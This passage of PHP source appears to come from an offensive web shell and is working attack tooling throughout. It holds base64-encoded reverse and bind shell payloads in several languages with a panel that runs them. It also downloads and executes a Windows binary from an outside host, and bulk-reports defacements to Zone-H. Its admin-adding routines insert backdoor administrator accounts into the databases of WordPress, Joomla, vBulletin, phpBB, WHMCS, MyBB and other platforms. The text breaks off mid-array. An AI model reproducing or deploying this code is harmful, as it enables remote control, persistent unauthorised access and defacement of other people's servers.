  $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
  $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
  $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
  $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
  $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
  $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
  echo "

| Back Connect |


";
  echo "


Mehtod:
  
Use:
  
IP:
 
 
Port: 
  
Run ` nc -l -v -p port ` on your computer and press ` >> ` button

";
  if (isset($_POST['alfa1']) && !empty($_POST['alfa1'])) {
    $lang = $_POST['alfa1'];
    $ip = $_POST['alfa2'];
    $port = $_POST['alfa3'];
    $arg = ($_POST['alfa4'] == 'bind' ? $port : $port.' '.$ip);
    $tmpdir = ALFA_TEMPDIR;
    $name = $tmpdir.'/'.$lang.uniqid().rand(1, 99999);
    $allow = array('perl','ruby','python','node');
    eval('$lan=$'.$lang.';');
    if (in_array($lang, $allow)) {
      if (__write_file($name, __get_resource($lan))) {
        if (_alfa_can_runCommand(true, true)) {
          $os = ($GLOBALS['sys'] != 'win') ? '1>/dev/null 2>&1 &' : '';
          $out = alfaEx("$lang $name $arg $os");
          if ($out == '') {
            $out = "
[ Finished...! ]
";
          }
          echo("
{$out}
");
        }
      } else {
        echo("
[ Failed...! ]
");
      }
    }
    if ($lang == 'java' || $lang == 'c') {
      $code = __get_resource($lan);
      $out = nl2br(bcinit($lang, $code, '', ''));
      echo("
{$out}
");
    }
    if ($lang == 'bcwin') {
      $alfa = new AlfaCURL();
      $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
      $tmpdir = ALFA_TEMPDIR;
      $f = @fopen($tmpdir.'/bcwin.exe', 'w+');
      @fwrite($f, $s);
      @fclose($f);
      $out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
    }
    if ($lang == 'php') {
      echo "
";
      $code = __get_resource($lan);
      if ($code !== false) {
        $code = "\$target = \"".$arg."\";\n".$code;
        eval($code);
        echo("
[ Finished...! ]
");
      }
      echo "
";
    }
  }
  echo "
";
  alfafooter();
}
function alfazoneh() {
  alfahead();
  echo '
';
  if (!function_exists('curl_version')) {
    echo "
PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK
";
  }
  $hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
  $reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
  echo '


| Zone-h Mass Poster |















';
  if ($_POST['alfa5'] && $_POST['alfa5'] == '>>') {
    ob_start();
    $hacker = $_POST['alfa1'];
    $method = $_POST['alfa2'];
    $neden = $_POST['alfa3'];
    $site = $_POST['alfa4'];
    if (empty($hacker)) {
      die(__pre()."
[+] YOU MUST FILL THE ATTACKER NAME [+]
");
    } elseif ($method == "------------------------------------SELECT-------------------------------------") {
      die(__pre()."
[+] YOU MUST SELECT THE METHOD [+]
");
    } elseif ($neden == "------------------------------------SELECT-------------------------------------") {
      die(__pre()."
[+] YOU MUST SELECT THE REASON [+]
");
    } elseif (empty($site)) {
      die(__pre()."
[+] YOU MUST INTER THE SITES LIST [+]
");
    }
    $i = 0;
    $sites = explode("\n", $site);
    $alfa = new AlfaCURL();
    while ($i < count($sites)) {
      if (substr($sites[$i], 0, 4) != "http") {
        $sites[$i] = "http://".$sites[$i];
      }
      $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=".$hacker."&domain1=". $sites[$i]."&hackmode=".$method."&reason=".$neden);
      ++$i;
    }
    echo __pre()."
[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]
";
  }
  echo "
";
  alfafooter();
}
function alfapwchanger() {
  alfahead();

  echo '

| Add New Admin |


';
  $vals = array('WordPress' => array('wp',2),'Joomla' => array('joomla',3),'vBulletin' => array('vb',5),'phpBB' => array('phpbb',6),'WHMCS' => array('whmcs',7),'MyBB' => array('mybb',8),'Php Nuke' => array('nuke',9),'Drupal' => array('drupal',10),'SMF' => array('smf',11));
  Alfa_Create_A_Tag('pwchanger', $vals);
  echo '
';
  if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'wp') {

    echo __pre().'
| WordPress |


'.getConfigHtml('wp').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host','id' => 'db_host', 'inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => 'wp_', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'kh', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa2'] && $_POST['alfa2'] == '>>') {
      $localhost = $_POST['alfa3'];
      $database = $_POST['alfa4'];
      $username = $_POST['alfa5'];
      $password = $_POST['alfa6'];
      $admin = $_POST['alfa8'];
      $SQL = $_POST['alfa9'];
      $prefix = $_POST['alfa10'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "insert into ".$prefix."users (ID,user_login,user_pass,user_email) values(null,'$admin','d4a590caacc0be55ef286e40a945ea45','$SQL')") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "select ID from ".$prefix."users where user_login='".$admin."'") or die(mysqli_error($conn));
      $sole = @mysqli_num_rows($solevisible);
      if ($sole == 1) {
        $solevis = @mysqli_fetch_assoc($solevisible);
        $res = $solevis['ID'];
      }
      $solevisible = @mysqli_query($conn, "insert into ".$prefix."usermeta (umeta_id,user_id,meta_key,meta_value) values(null,'".$res."','first_name','solevisible'),(null,'".$res."','last_name','solevisible'),(null,'".$res."','nickname','solevisible'),(null,'".$res."','description','solevisible'),(null,'".$res."','rich_editing','true'),(null,'".$res."','comment_shortcuts','false'),(null,'".$res."','admin_color','fresh'),(null,'".$res."','use_ssl','0'),(null,'".$res."','show_admin_bar_front','true'),(null,'".$res."','".$prefix."capabilities','a:1:{s:13:\"administrator\";b:1;}'),(null,'".$res."','".$prefix."user_level','10'),(null,'".$res."','show_welcome_panel','1'),(null,'".$res."','".$prefix."dashboard_quick_press_last_post_id','3')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if ($_POST['alfa2'] && $_POST['alfa2'] == 'joomla') {

    echo __pre().'
| Joomla |
'.getConfigHtml('joomla').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => 'jos_', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa3'];
      $database = $_POST['alfa4'];
      $username = $_POST['alfa5'];
      $password = $_POST['alfa6'];
      $admin = $_POST['alfa8'];
      $SQL = $_POST['alfa9'];
      $prefix = $_POST['alfa10'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "insert into ".$prefix."users (id,name,username,email,password) values(null,'Super User','".$admin."','".$SQL."','d4a590caacc0be55ef286e40a945ea45')") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "select id from ".$prefix."users where username='".$admin."'") or die(mysqli_error($conn));
      $sole = @mysqli_num_rows($solevisible);
      if ($sole == 1) {
        $solevis = @mysqli_fetch_assoc($solevisible);
        $res = $solevis['id'];
      }
      $solevisible = @mysqli_query($conn, "INSERT INTO ".$prefix."user_usergroup_map (user_id,group_id) VALUES ('".$res."', '8')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if ($_POST['alfa4'] && $_POST['alfa4'] == 'vb') {

    echo __pre().'
| vBulletin |
'.getConfigHtml('vb').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa3'];
      $username = $_POST['alfa5'];
      $password = $_POST['alfa6'];
      $prefix = $_POST['alfa7'];
      $admin = $_POST['alfa8'];
      $SQL = $_POST['alfa9'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_connect_error());
      $pw_col = @mysqli_connect("SELECT column_name FROM information_schema.columns where table_name = '{$prefix}user' and column_name = 'password' and table_schema = '{$database}'");
      $pw_col = @mysqli_num_rows($pw_col);
      $adm_perm = "16744444";
      if ($pw_col > 0) {
        $solevisible = @mysqli_query($conn, "insert into {$prefix}user (userid,usergroupid,username,password,salt,email,passworddate,joindate) values(null,'6','$admin','52e28b78f55641cd4618ad1a20f5fd5c','Xw|IbGLhTQA-AwApVv>61y^(z]*','$SQL','".date('Y-m-d')."','".time()."','blowfish:10','1984-05-20')") or die(mysqli_error($conn));
      }
      $solevisible = @mysqli_query($conn, "select userid from {$prefix}user where username='".$admin."'") or die(mysqli_error($conn));
      $sole = mysqli_num_rows($solevisible);
      if ($sole == 1) {
        $solevis = mysqli_fetch_assoc($solevisible);
        $res = $solevis['userid'];
      }
      $solevisible = @mysqli_query($conn, "insert into {$prefix}administrator (userid,adminpermissions) values('".$res."','".$adm_perm."')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if (isset($_POST['alfa5']) && $_POST['alfa5'] == 'phpbb') {

    echo __pre().'
| phpBB |
'.getConfigHtml('phpbb').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa3'];
      $username = $_POST['alfa4'];
      $password = $_POST['alfa6'];
      $admin = $_POST['alfa8'];
      $SQL = $_POST['alfa9'];
      $prefix = $_POST['alfa10'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $hash = md5('solevisible');
      $solevisible = @mysqli_query($conn, "UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "UPDATE ".$prefix."users SET username_clean ='".$admin."' WHERE user_type = 3") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "UPDATE ".$prefix."users SET user_password ='".$hash."' WHERE user_type = 3") or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "UPDATE ".$prefix."users SET user_email ='".$SQL."' WHERE username_clean = 'admin'") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if (isset($_POST['alfa6']) && $_POST['alfa6'] == 'whmcs') {

    echo __pre().'
| Whmcs |
'.getConfigHtml('whmcs').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa3'];
      $username = $_POST['alfa4'];
      $password = $_POST['alfa5'];
      $admin = $_POST['alfa8'];
      $SQL = $_POST['alfa9'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "insert into tbladmins (id,roleid,username,password,email,template,homewidgets) values(null,'1','".$admin."','d4a590caacc0be55ef286e40a945ea45','".$SQL."','blend','getting_started:true,orders_overview:true,supporttickets_overview:true,my_notes:true,client_activity:true,open_invoices:true,activity_log:true|income_overview:true,system_overview:true,whmcs_news:true,sysinfo:true,admin_activity:true,todo_list:true,network_status:true,income_forecast:true|')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if (isset($_POST['alfa7']) && $_POST['alfa7'] == 'mybb') {

    echo __pre().'
| Mybb |
'.getConfigHtml('mybb').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
     array('color' => 'FFFFFF', 'tdName' => 'Table Prefix', 'id' => 'db_prefix','inputName' => 'prefix', 'inputValue' => '', 'inputSize' => '50'),
     'td6' =>
     array('color' => 'FF0000', 'tdName' => 'Admin User', 'inputName' => 'admin', 'inputValue' => 'admin', 'inputSize' => '50'),
     'td7' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'toftof', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
     'td8' =>
     array('color' => 'FF0000', 'tdName' => 'Admin Email', 'inputName' => 'email', 'inputValue' => 'solevisible@fbi.gov', 'inputSize' => '50')
    );
    create_table($table);
    echo '
';
    if ($_POST['alfa1'] && $_POST['alfa1'] == '>>') {
      $localhost = $_POST['alfa2'];
      $database = $_POST['alfa3'];
      $username = $_POST['alfa4'];
      $password = $_POST['alfa5'];
      $admin = $_POST['alfa8'];
      $SQL = $_POST['alfa9'];
      $prefix = $_POST['alfa10'];
      $conn = @mysqli_connect($localhost, $username, $password, $database) or die(mysqli_error($conn));
      $solevisible = @mysqli_query($conn, "insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','e71f2c3265619038d826a1ac6e2b9b8e','ywza68lS','".$SQL."','4')") or die(mysqli_error($conn));
      if ($solevisible) {
        __alert('Success... '.$admin.' is created...');
      }
    }
  }
  if (isset($_POST['alfa8']) && $_POST['alfa8'] == 'nuke') {

    echo __pre().'
| PhpNuke |
'.getConfigHtml('phpnuke').'
';
    $table = array('td1' =>
     array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'id' => 'db_host','inputName' => 'localhost', 'inputValue' => 'localhost', 'inputSize' => '50'),
     'td2' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'id' => 'db_name','inputName' => 'database', 'inputValue' => '', 'inputSize' => '50'),
     'td3' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db User', 'id' => 'db_user','inputName' => 'username', 'inputValue' => '', 'inputSize' => '50'),
     'td4' =>
     array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'id' => 'db_pw','inputName' => 'password', 'inputValue' => '', 'inputSize' => '50'),
     'td5' =>
